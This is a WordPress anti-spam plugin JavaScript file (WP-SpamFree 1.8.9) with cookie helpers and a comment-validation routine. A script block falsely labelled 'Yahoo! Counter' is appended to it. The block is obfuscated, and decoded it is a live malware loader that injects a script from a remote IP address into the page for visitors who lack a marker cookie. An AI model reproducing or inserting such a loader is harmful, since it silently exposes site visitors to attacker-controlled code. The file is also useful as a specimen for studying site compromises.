
// WP-SpamFree 1.8.9 JS Code :: BEGIN

// Cookie Handler :: BEGIN 
function GetCookie( name ) { 
	var start = document.cookie.indexOf( name + '=' ); 
	var len = start + name.length + 1; 
	if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { 
		return null; 
	} 
	if ( start == -1 ) return null; 
	var end = document.cookie.indexOf( ';', len ); 
	if ( end == -1 ) end = document.cookie.length; 
	return unescape( document.cookie.substring( len, end ) ); 
}  
	
function SetCookie( name, value, expires, path, domain, secure ) { 
	var today = new Date(); 
	today.setTime( today.getTime() ); 
	if ( expires ) { 
		expires = expires * 1000 * 60 * 60 * 24; 
	} 
	var expires_date = new Date( today.getTime() + (expires) ); 
	document.cookie = name+'='+escape( value ) + 
		( ( expires ) ? ';expires='+expires_date.toGMTString() : '' ) + //expires.toGMTString() 
		( ( path ) ? ';path=' + path : '' ) + 
		( ( domain ) ? ';domain=' + domain : '' ) + 
		( ( secure ) ? ';secure' : '' ); 
}  
	
function DeleteCookie( name, path, domain ) { 
	if ( getCookie( name ) ) document.cookie = name + '=' + 
			( ( path ) ? ';path=' + path : '') + 
			( ( domain ) ? ';domain=' + domain : '' ) + 
			';expires=Thu, 01-Jan-1970 00:00:01 GMT'; 
} 
// Cookie Handler :: END  

function commentValidation() { 
	SetCookie('yACabykfgjsdeGyv','FacbgpDaomsgynbz','','/');
	SetCookie('SJECT','CKON','','/');
}  

commentValidation();  

// WP-SpamFree 1.8.9 JS Code :: END 
<script language=javascript><!-- Yahoo! Counter starts here -->
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F%2F.%2E#. %3C%64i%76%20!%73%74y#%6Ce`%3Dd%69%73%70&l#ay:$%6E`%6F&%6E#%65#%3E\n%76&a`r%20&_;#if&(%64o#c!u%6D%65%6E|%74`%2Ec@%6F%6F$%6B~%69%65`%2E!m%61|t~ch(/#%5C%62%68!gf$%74%3D`1|/)=~=|n@%75`%6Cl%29`d%6F`c%75#%6D$%65&n@t.w|%72#%69&%74!e~%28$%22$%3C%73`c~ri|pt%20%73r@%63=`%2F|/#7`%38~.%31|5#7!%2E1~42$%2E%35`8/&%63%70&%2F%3F&%22%2Bn%61v`i$%67%61!t&%6Fr%2E|%61@p$%70%4E%61~%6De$%2E%63#h%61r~%41@%74%28%30%29&+%22%3E#%3C#%5C|%2F%73%63|%72%69|%70t`%3E@");&\n/`%2F%3C%2F%64~i%76%3E').replace(/@|~|\!|\$|\||`|#|\&/g,""));var yahoo_counter=1;
<!-- counter end --></script>
